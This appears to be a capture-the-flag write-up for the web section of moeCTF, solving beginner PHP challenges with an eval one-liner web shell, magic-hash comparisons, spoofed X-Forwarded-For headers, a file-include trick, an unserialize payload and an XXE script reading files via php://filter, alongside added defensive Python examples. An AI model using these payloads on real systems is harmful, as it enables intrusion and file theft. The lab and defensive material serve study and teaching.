【moeCTF Writeup - 0x06】Web: somehow got AK (all kills) on this part, but only because the challenges were easy...
Since I chose the web direction in XDSEC, I should study web knowledge properly.
【moeCTF Writeup】full table of contents:
Web 11/11
GET
50 points
http://web.moectf.online/GET/
Hint
What is GET?
How to GET?
Open the target address:
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
include 'flag.php';
$a = $_GET['a'];
if ($a == flag) die($flag);
```
Append ?a=flag to the URL to pass the value via GET:
http://web.moectf.online/GET/?a=flag
Opening it gives the flag: moectf{Y0u_kn0w_G4T_n0w}
POST
50 points
http://web.moectf.online/POST/
Hints
Link:
What is POST?
How to POST?
```php
<?php
error_reporting(0);
highlight_file(__FILE__);
include 'flag.php';
$a = $_POST['a'];
if ($a == flag) die($flag);
```
POST a=flag to it:
and you get the flag: moectf{Y0u_kn4w_p0st_n0w}
Here I used Firefox Developer Edition with the HackBar V2 extension to send the POST; it is lightweight and beginner-friendly.
Little Cookie (小饼干)
50 points
http://web.moectf.online/bis/
"Little cookie" just means a cookie.
Browser > Developer Tools > Network > Cookies shows the cookie:
```text
Cookie "moectf{y0u_c4n't_e4t_thi3_c00k1e}"
```
Flag: moectf{y0u_c4n't_e4t_thi3_c00k1e}
(It is also present in the response headers.)
Introduction
50 points
Address:
Can you find the flag?
Viewing the HTML source, the following comments are found; they are the flag.
One-liner (一句话)
100 points
http://39.98.86.109:10000/
Don't mess around once you have the flag.
Open the page:
```php
<?php
error_reporting(0);
highlight_file("index.php");
eval($_POST['a']);
?>
```
It already embeds a one-line web shell: eval($_POST['a']);
Use the famous China Chopper:
```text
[/var/www/html/]$ ls -l ../../../
total 84
drwxr-xr-x   3 root root 4096 Feb 15  2016 app
drwxr-xr-x   1 root root 4096 Feb 15  2016 bin
drwxr-xr-x   2 root root 4096 Apr 10  2014 boot
drwxr-xr-x   5 root root  340 Aug  4 03:21 dev
drwxr-xr-x   1 root root 4096 Aug  4 03:21 etc
-rw-r--r--   1 root root   40 Jun 17 16:22 flag
drwxr-xr-x   2 root root 4096 Apr 10  2014 home
drwxr-xr-x   1 root root 4096 Feb 15  2016 lib
drwxr-xr-x   2 root root 4096 Jan 19  2016 lib64
drwxr-xr-x   2 root root 4096 Jan 19  2016 media
drwxr-xr-x   2 root root 4096 Apr 10  2014 mnt
drwxr-xr-x   2 root root 4096 Jan 19  2016 opt
dr-xr-xr-x 186 root root    0 Aug  4 03:21 proc
drwx------   1 root root 4096 Aug  4 03:23 root
drwxr-xr-x   1 root root 4096 Aug  4 03:21 run
drwxr-xr-x   1 root root 4096 Jan 19  2016 sbin
drwxr-xr-x   2 root root 4096 Jan 19  2016 srv
dr-xr-xr-x  13 root root    0 Aug  4 03:21 sys
drwxr-xr-x   1 root root 4096 Feb 15  2016 usr
drwxr-xr-x   1 root root 4096 Feb 15  2016 var
[/var/www/html/]$ cat ../../../flag
moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}
```
So we get the flag: moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}
EzMath
150 points
http://39.98.86.109:10001/
A simple math problem.
```python
import requests

r = requests.Session()
s = r.post("http://39.98.86.109:10001/")
s.encoding = 'utf-8'
print(s.text)
print("====================")
for i in range(1):
    tet = s.text
    # the expression sits right after a <br>, e.g. "...<br>12+34=?"
    iAlg = tet.find("br>")
    alg = tet[iAlg+3:iAlg+15]
    iEqu = alg.find("=")
    alg = alg[:iEqu]
    print(alg, '============', str(eval(alg)))
    # submit the computed answer in the same session
    s = r.post('http://39.98.86.109:10001/', data={"a": (eval(alg))})
    s.encoding = 'utf-8'
    print(s.text)
```
Flag obtained: moectf{MA7H_1s_s0_ea5y!!r1ght?}
I heard that simply disabling JavaScript also works?
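The solve script above runs eval() on text taken straight from the server, which means whoever controls that page controls the solver's machine. As an added example (not the write-up's own code), the Python below reads the question with a regex anchored on the trailing "=?" instead of a fixed 12-character slice and evaluates it with an ast walker that admits only numeric literals and arithmetic operators; the SAMPLE_PAGE layout is constructed for the example, since the real page is not reproduced in the write-up.

```python
import ast
import operator
import re

# Constructed sample of a challenge page; the real markup is not shown on the write-up.
SAMPLE_PAGE = "<h1>EzMath</h1><br>1234+56*78=?<br><form>...</form>"

# Only these operators are allowed: plain arithmetic, no calls, names or attributes.
_BIN_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def extract_expression(page: str) -> str:
    """Pull the 'expr=?' question out of the page text, whatever its length."""
    m = re.search(r"([0-9+\-*/%() ]+?)\s*=\s*\?", page)
    if m is None:
        raise ValueError("no arithmetic question found on the page")
    return m.group(1).strip()


def safe_eval(expr: str):
    """Evaluate arithmetic without eval(): every node must be a literal number,
    a binary/unary operator from the tables above, or parentheses."""
    tree = ast.parse(expr, mode="eval")

    def walk(node: ast.AST):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if (isinstance(node, ast.Constant) and isinstance(node.value, (int, float))
                and not isinstance(node.value, bool)):
            return node.value
        if isinstance(node, ast.BinOp) and type(node.op) in _BIN_OPS:
            return _BIN_OPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
            return _UNARY_OPS[type(node.op)](walk(node.operand))
        raise ValueError(f"disallowed syntax: {type(node).__name__}")

    return walk(tree)


def solve_page(page: str):
    """Answer for one page: extract the question, then evaluate it safely."""
    return safe_eval(extract_expression(page))


if __name__ == "__main__":
    print(extract_expression(SAMPLE_PAGE), "=", solve_page(SAMPLE_PAGE))
```

The same extract/evaluate pair can replace the two eval() calls in the session loop; anything that is not arithmetic, such as a call or an attribute access, raises ValueError instead of running.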
Half-hearted (三心二意)
points
http://39.97.238.171:8002/
Hint
Holding a three-equals-sign heart, yet doing two-equals-sign deeds.
```php
<?php
$a = $_GET['a'];
$b = $_POST['b'];
$c = $_REQUEST['c'];
$d = $_COOKIE['d'];
if (!isset($a, $b, $c, $d)) {
    highlight_file(__FILE__);
} else {
    if (is_numeric($a) and $a == false) {
        echo 'A is OK!';
        echo '<br/>';
        if (!is_numeric($b) and $b == 0x125e591) {
            echo 'B is OK!';
            echo '<br/>';
            if ($c != 240610708 and md5($c) == md5(240610708)) {
                echo 'C is OK!';
                echo '<br/>';
                if (strlen($d) < 7 and $d != 0 and $d ** 2 == 0) {
                    include('/flag');
                } else {
                    echo "D is not wanted.<br/>";
                    highlight_file(__FILE__);
                }
            } else {
                echo "C is not wanted.<br/>";
                highlight_file(__FILE__);
            }
        } else {
            echo "Too young too simple.<br/>";
            highlight_file(__FILE__);
        }
    } else {
        echo "A is not wanted.<br/>";
        highlight_file(__FILE__);
    }
}
```
```python
import requests

header = {}
cookie = {'d': '1e-222'}
postpayload = {"b": "19260817a", "c": "QNKCDZO"}
r = requests.post('http://39.97.238.171:8002/?a=0&c=QNKCDZO', data=postpayload, cookies=cookie)
print(r.text[:100])
```
moectf{PHP_1s_the_besT_lAngu@ge}
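Each of the four checks in this challenge passes only because of the loose == operator: "0" is numeric yet falsy, a leading-numeric string equals the number it starts with, two md5 digests of the form 0e<digits> are both numeric strings worth zero, and 1e-222 squared underflows to 0.0. As an added example (not the write-up's code), the Python below models PHP 7's string-to-number conversion for == just far enough to reproduce those four conditions; the model is an assumption of this example and not a full reimplementation of PHP, and the same checks written with === or hash_equals() would reject all four inputs.

```python
import hashlib
import re

# Simplified model (an assumption of this example, not a full PHP reimplementation)
# of how PHP 7 converts a string for ==: its longest leading numeric prefix, or 0
# when it has none; two strings that are both entirely numeric compare as numbers.
_NUMERIC_PREFIX = re.compile(r"^\s*[+-]?(?:\d+\.?\d*|\.\d+)(?:[eE][+-]?\d+)?")


def php_numeric_prefix(s: str):
    """Return (numeric value, whole_string_is_numeric); the flag is is_numeric()."""
    m = _NUMERIC_PREFIX.match(s)
    if m is None:
        return 0.0, False
    return float(m.group(0)), m.end() == len(s)


def php_truthy(v) -> bool:
    """PHP boolean conversion: among strings only '' and '0' are false."""
    if isinstance(v, str):
        return v not in ("", "0")
    return bool(v)


def php7_loose_equals(a, b) -> bool:
    """Model PHP 7 '==' for the bool/string/number cases this challenge relies on."""
    if isinstance(a, bool) or isinstance(b, bool):
        return php_truthy(a) == php_truthy(b)
    if isinstance(a, str) and isinstance(b, str):
        va, wa = php_numeric_prefix(a)
        vb, wb = php_numeric_prefix(b)
        return va == vb if (wa and wb) else a == b
    if isinstance(a, str):
        return php_numeric_prefix(a)[0] == b
    if isinstance(b, str):
        return a == php_numeric_prefix(b)[0]
    return a == b


def is_magic_hash(hexdigest: str) -> bool:
    """A digest shaped like 0e<digits> is a numeric string equal to zero, so
    PHP's == treats every such digest as equal to every other one."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def passes_check_d(d: str) -> bool:
    """Check D: strlen < 7, d != 0 numerically, but d ** 2 == 0 by float underflow."""
    v, _ = php_numeric_prefix(d)
    return len(d) < 7 and v != 0 and v ** 2 == 0


def check_all(a: str, b: str, c: str, d: str) -> bool:
    """The challenge's four conditions evaluated under the model above."""
    ok_a = php_numeric_prefix(a)[1] and php7_loose_equals(a, False)
    ok_b = (not php_numeric_prefix(b)[1]) and php7_loose_equals(b, 0x125e591)
    ok_c = (not php7_loose_equals(c, 240610708)) and php7_loose_equals(
        md5_hex(c), md5_hex("240610708"))
    return ok_a and ok_b and ok_c and passes_check_d(d)


if __name__ == "__main__":
    print(check_all("0", "19260817a", "QNKCDZO", "1e-222"))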
Russian Headgear (俄罗斯头套)
200 points
http://39.98.86.109:10002/
Header
```text
你的ip是:██████████████████████
不是127.0.0.1的话我可不会给你flag哦
```
```text
你的ip是:127.0.0.1
什么?你不是从"https://www.baidu.com"来的?那可不行...
```
```text
你的ip是:127.0.0.1
什么?你用的不是POST请求?那可不行...
```
```text
你的ip是:127.0.0.1
什么?你用的不是"supreme"浏览器?那可不行...
```
```http
Host: 39.98.86.109:10002
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://www.baidu.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Origin: http://39.98.86.109:10002
Connection: keep-alive
Cookie: PHPSESSID=98rbnl919ufqd9s19fo5qbnom0
Upgrade-Insecure-Requests: 1
Server: supreme
X-Forwarded-For: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
```
moectf{r3que5t_he4der_1s_ea5y!!}
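Every condition in this challenge (the client IP taken from X-Forwarded-For, the Referer, the method, the browser name) is read from a header the client writes, so none of them identifies anyone. As an added example that is not part of the write-up, the Python below shows the only safe way to use X-Forwarded-For: trust the header when the TCP peer is one of your own reverse proxies (the 10.0.0.0/8 range is an assumed value for this example), and take the rightmost hop that is not such a proxy as the client address.

```python
import ipaddress

# Assumed reverse-proxy range for this example; a real deployment lists its own proxies.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, x_forwarded_for: str = "") -> str:
    """Return the address to use for access decisions.

    remote_addr is the TCP peer (REMOTE_ADDR in PHP); x_forwarded_for is the
    raw header. Walk the header from the right, skipping our own proxies; the
    first hop that is not a trusted proxy is the client. If the peer itself is
    not a trusted proxy, the header was never set by us and is ignored.
    """
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer):
        return str(peer)
    hops = [h.strip() for h in x_forwarded_for.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            break  # malformed entry: trust nothing to the left of it
        if not _is_trusted_proxy(addr):
            return str(addr)
    return str(peer)


def is_local_client(remote_addr: str, x_forwarded_for: str = "") -> bool:
    """The challenge's '127.0.0.1 only' rule, applied to the derived client IP."""
    return ipaddress.ip_address(client_ip(remote_addr, x_forwarded_for)).is_loopback


if __name__ == "__main__":
    # Constructed cases: a direct client sending a forged header, and a proxied one.
    print(client_ip("203.0.113.5", "127.0.0.1"))
    print(client_ip("10.0.0.2", "127.0.0.1, 203.0.113.5"))
```

With this rule a direct client that writes X-Forwarded-For: 127.0.0.1 is still seen as its real peer address, and a client behind the proxy cannot prepend entries to hide the address the proxy appends.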
Moe include
200 points
http://web.moectf.online/include/
```html
<a href="?file=hint.php">do not click</a>
```
```html
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
</body>
</html>
```
```php
<?php
error_reporting(E_ALL);
ini_set('open_basedir', '/var/www/moectf/include');
$file = $_GET["file"];
if (stristr($file, "php://input") || stristr($file, "zip://") || stristr($file, "phar://") || stristr($file, "data:")) {
    exit('get out!');
}
if ($file) {
    include($file);
} else {
    echo '<a href="?file=hint.php">do not click</a>';
}
?>
```
moectf{php_is_the_best_language}
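The include above refuses four wrapper prefixes and passes everything else to include(), which is a blocklist: it can only ever name the inputs its author thought of. As an added example that is not part of the write-up or the challenge, the Python below contrasts that check with an allowlist resolver that refuses any scheme, any traversal, and any name outside a fixed set; the ALLOWED set is an assumption for the example, and BASE_DIR is the open_basedir value from the challenge source.

```python
import posixpath

BASE_DIR = "/var/www/moectf/include"   # open_basedir from the challenge source
ALLOWED = {"hint.php", "index.php"}    # assumed set of includable pages


def blocklist_allows(file: str) -> bool:
    """The challenge's check: only four wrapper prefixes are refused (case-insensitive)."""
    lowered = file.lower()
    return not any(bad in lowered for bad in ("php://input", "zip://", "phar://", "data:"))


def resolve_include(file: str):
    """Allowlist version: return the absolute path to include, or None to refuse.

    Any ':' rules out every stream wrapper at once, a NUL byte is rejected,
    the name is normalised, and it must be one of ALLOWED under BASE_DIR.
    """
    if ":" in file or "\0" in file:
        return None
    name = posixpath.normpath(file)
    if name.startswith("/") or name.startswith(".."):
        return None
    if name not in ALLOWED:
        return None
    full = posixpath.join(BASE_DIR, name)
    return full if full.startswith(BASE_DIR + "/") else None


if __name__ == "__main__":
    for candidate in ("hint.php", "../../etc/passwd", "data:text/plain,hi"):
        print(candidate, blocklist_allows(candidate), resolve_include(candidate))
```

The resolver never looks at what the attacker wrote beyond checking membership, so adding a new wrapper or encoding trick changes nothing; with the blocklist, every new trick is a new bypass.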
Moe unserialize
250 points
http://web.moectf.online/unserialize/
One day, Equatorial Penguin was happily using vim to dig a pit for his juniors when, with a sudden spasm, the computer crashed. The penguin is heartbroken; can you, clever one, help the penguin find the pit he dug?
```php
<?php
error_reporting(0);
class Moe
{
    public $a;
    protected $b;
    private $c;
    function __destruct()
    {
        if ($this->a === '1' && $this->b === '2' && $this->c === '3') {
            include 'flag.php';
            die($flag);
        }
    }
}
$moe = $_GET['flag'];
unserialize($moe);
?>
```
serialize():
```php
<?php
class Moe
{
    public $a;
    public $b;
    public $c;
    function __destruct()
    {
        if ($this->a === '1' && $this->b === '2' && $this->c === '3') {
            include 'flag.php';
            die($flag);
        }
    }
}
$m = new Moe;
$m->a = '1';
$m->b = '2';
$m->c = '3';
echo serialize($m);
?>
```
```text
?flag=O:3:"Moe":3:{s:1:"a";s:1:"1";s:1:"b";s:1:"2";s:1:"c";s:1:"3";}
```
Visit this to get the flag: moectf{Y0u_4re_A_Moe}
Still a question: why can the protected and private members be accessed?
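On the open question: serialize() records visibility inside the property name, a protected $b becomes the key "\0*\0b" and a private $c of class Moe becomes "\0Moe\0c", and unserialize() writes whatever properties the string lists without any visibility check. From PHP 7.1 on it also maps a plain public-style name onto a declared protected or private property, which is why the all-public payload above is accepted. As an added example (not the write-up's code), the Python below is a small parser for the PHP serialization format that decodes those mangled names and lists every class an unserialize() of the input would instantiate, which is the signal a request filter or log rule should alert on; both payloads in it are constructed for the example.

```python
# Constructed payloads: the write-up's all-public form, and the form serialize()
# really emits for a protected $b and a private $c declared in class Moe.
PAGE_PAYLOAD = 'O:3:"Moe":3:{s:1:"a";s:1:"1";s:1:"b";s:1:"2";s:1:"c";s:1:"3";}'
MANGLED_PAYLOAD = ('O:3:"Moe":3:{s:1:"a";s:1:"1";s:4:"\0*\0b";s:1:"2";'
                   's:6:"\0Moe\0c";s:1:"3";}')


def _read_until(data: str, pos: int, ch: str):
    end = data.index(ch, pos)
    return data[pos:end], end + 1


def decode_property_name(raw: str):
    """Split a serialized property key into (name, visibility)."""
    if raw.startswith("\0*\0"):
        return raw[3:], "protected"
    if raw.startswith("\0"):
        cls, _, name = raw[1:].partition("\0")
        return name, f"private({cls})"
    return raw, "public"


def parse_php_serialized(data: str, pos: int = 0):
    """Parse one value at pos and return (value, position after it).
    Arrays become lists of (key, value); objects become
    {'__class__': name, 'props': [(name, visibility, value), ...]}."""
    tag = data[pos]
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in "ibd":                                 # i:5;  b:1;  d:0.5;
        raw, pos = _read_until(data, pos + 2, ";")
        value = {"i": int, "b": lambda r: r == "1", "d": float}[tag](raw)
        return value, pos
    if tag == "s":                                   # s:<len>:"<bytes>";
        length, pos = _read_until(data, pos + 2, ":")
        n = int(length)
        return data[pos + 1:pos + 1 + n], pos + 1 + n + 2
    if tag == "a":                                   # a:<count>:{k;v;...}
        count, pos = _read_until(data, pos + 2, ":")
        pos += 1
        items = []
        for _ in range(int(count)):
            k, pos = parse_php_serialized(data, pos)
            v, pos = parse_php_serialized(data, pos)
            items.append((k, v))
        return items, pos + 1
    if tag == "O":                                   # O:<len>:"<class>":<count>:{...}
        length, pos = _read_until(data, pos + 2, ":")
        n = int(length)
        cls = data[pos + 1:pos + 1 + n]
        count, pos = _read_until(data, pos + 1 + n + 2, ":")
        pos += 1
        props = []
        for _ in range(int(count)):
            raw_name, pos = parse_php_serialized(data, pos)
            value, pos = parse_php_serialized(data, pos)
            props.append(decode_property_name(raw_name) + (value,))
        return {"__class__": cls, "props": props}, pos + 1
    raise ValueError(f"unsupported tag {tag!r} at offset {pos}")


def classes_in(payload: str):
    """Every class name unserialize() would instantiate for this input; a
    non-empty result on user-supplied data is what a filter should reject."""
    found = []

    def walk(v):
        if isinstance(v, dict) and "__class__" in v:
            found.append(v["__class__"])
            for _, _, pv in v["props"]:
                walk(pv)
        elif isinstance(v, list):
            for _, pv in v:
                walk(pv)

    value, end = parse_php_serialized(payload)
    if end != len(payload):
        raise ValueError("trailing data after serialized value")
    walk(value)
    return found


if __name__ == "__main__":
    print(parse_php_serialized(MANGLED_PAYLOAD)[0])
    print(classes_in(PAGE_PAYLOAD))
```

The application-side fix is not to unserialize() user input at all (JSON carries no class names); where that is impossible, unserialize($moe, ['allowed_classes' => false]) turns any O: record into __PHP_Incomplete_Class so no __destruct() of a real class can run.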
EzXXE
250 points
http://39.97.238.171:8001/
```php
<?php
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if (strpos($xmlfile, "flag1.txt") !== FALSE) {
    if (strpos($xmlfile, 'file:/') === FALSE) {
        die("Please use file protocol.<br/><br/>");
    }
}
if (strpos($xmlfile, "flag2.php") !== FALSE) {
    if (strpos($xmlfile, 'file:/') !== FALSE) {
        echo "Why not try php://filter?";
        echo '<br/><br/>';
    }
}
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$test = simplexml_import_dom($dom);
echo $test;
highlight_file(__FILE__);
?>
```
```python
import requests
import base64

if __name__ == '__main__':
    url = 'http://39.97.238.171:8001/'
    # external entity resolved through php://filter so the PHP source comes back base64-encoded
    xml = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flags/flag2.php">
]>
<value>&xxe;</value>"""
    req = requests.request(method='POST', url=url, data=xml)
    print(req.text)
    # decode the base64 returned by the server
    print(base64.b64decode(b'PD9waHAgJGZsYWcyID0gJzRuZF9waHBfZjFsdDNyfSc7ID8+'))
```
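The challenge is exploitable because loadXML() is called with LIBXML_NOENT | LIBXML_DTDLOAD and the entity loader switched on, so the DTD in the request body is honoured and its SYSTEM entity is fetched. As an added example (not the write-up's code), the Python below inspects a request body before any XML parser touches it, reports every entity declaration with the scheme it points at, and implements the usual policy of refusing any document that carries a DOCTYPE; the two bodies are constructed for the example, the second mirroring the declaration used above. The PHP-side equivalent is to leave the entity loader disabled and to drop those two flags from loadXML().

```python
import re

# Constructed request bodies: a harmless one and one declaring an external entity.
SAFE_BODY = '<?xml version="1.0"?><value>hello</value>'
XXE_BODY = '''<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/flags/flag2.php">
]>
<value>&xxe;</value>'''

_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.I)
# <!ENTITY [%] name SYSTEM "uri"> | <!ENTITY name PUBLIC "id" "uri"> | <!ENTITY name "text">
_ENTITY = re.compile(
    r'<!ENTITY\s+(?P<param>%\s*)?(?P<name>[\w.-]+)\s+'
    r'(?:(?P<kind>SYSTEM|PUBLIC)\s+(?:"[^"]*"\s+)?"(?P<uri>[^"]*)"|"(?P<internal>[^"]*)")',
    re.I,
)


def inspect_xml(body: str) -> dict:
    """Describe the DTD content of a body without parsing it."""
    entities = []
    for m in _ENTITY.finditer(body):
        uri = m.group("uri")
        entities.append({
            "name": m.group("name"),
            "parameter": m.group("param") is not None,
            "external": m.group("kind") is not None,
            "uri": uri,
            "scheme": uri.split(":", 1)[0].lower() if uri and ":" in uri else None,
        })
    return {"has_doctype": _DOCTYPE.search(body) is not None, "entities": entities}


def accept_xml(body: str) -> bool:
    """Policy: a request body carrying any DOCTYPE is refused outright.
    Internal entities are not dangerous by themselves, but rejecting the
    DTD wholesale is simpler to audit than distinguishing them."""
    return not inspect_xml(body)["has_doctype"]


def alert_lines(body: str):
    """Log lines a filter would emit for the external entities in a body."""
    return [f"xxe: external entity {e['name']} -> {e['scheme']} ({e['uri']})"
            for e in inspect_xml(body)["entities"] if e["external"]]


if __name__ == "__main__":
    for body in (SAFE_BODY, XXE_BODY):
        print(accept_xml(body), alert_lines(body))
```

Schemes such as file, php and http in the alert line are what distinguishes local-file reads and server-side requests from an ordinary DTD, which is useful when the parser itself cannot be changed immediately.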
To be continued...